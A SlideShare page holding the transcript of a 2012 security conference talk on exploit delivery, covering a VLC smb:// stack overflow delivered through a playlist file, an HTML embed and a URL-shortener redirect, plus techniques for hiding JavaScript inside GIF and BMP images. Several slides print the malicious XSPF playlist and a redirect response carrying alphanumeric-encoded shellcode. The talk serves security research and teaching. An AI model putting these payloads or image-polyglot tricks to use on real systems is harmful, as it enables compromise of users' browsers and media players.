• Save
Innovative Exploit Delivery
Upcoming SlideShare
Loading in...5
×
 

Innovative Exploit Delivery

on

  • 2,626 views

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation ...

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Statistics

Views

Total Views
2,626
Views on SlideShare
2,542
Embed Views
84

Actions

Likes
1
Downloads
0
Comments
1

4 Embeds 84

https://twitter.com 51
http://brovary-osvita-test.edukit.kiev.ua 28
http://www.linkedin.com 4
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Innovative Exploit Delivery Innovative Exploit Delivery Presentation Transcript

    • INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAHnet-square HITB2012KUL
    • # who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.• M.S. Computer Science Purdue University.• saumil@net-square.com• LinkedIn: saumilshah• Twitter: @therealsaumilnet-square
    • My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open"net-square
    • When two forces combine... Web Binary Hacking Exploitsnet-square
    • SNEAKY LETHALnet-square
    • net-square
    • 302 IMG JS HTML5net-square
    • net-square
    • VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}• Classic Stack Overflow.net-square
    • VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList></playlist> net-square
    • Alpha Encoded Tiny ZOMFG Exploit URLnet-square
    • 100% Pure Alphanum!net-square
    • VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
    • 301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square
    • net-square
    • Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!net-square
    • net-square
    • Im an evil Javascript Im an innocent imagenet-square
    • <CANVAS>net-square
    • net-square c) no eval()
    • Same Same No Different! var a = eval(str); a = (new Function(str))();net-square
    • d) IMAJSnet-square
    • IMAJS Seeing is Believingnet-square
    • Browser Support for IMAJS-GIFHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square
    • Browser Support for IMAJS-BMPHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square
    • e) The αq exploitnet-square
    • Encode using Alpha channelnet-square
    • Demo IMAJS αq FTW!net-square
    • f) ONE LAST DEMO!!! net-square
    • The FUTURE? HTML5 Video SVG WebGL Mobile Browsersnet-square
    • KTHXBAI See you in 2013??net-square saumil@net-square.com | @therealsaumil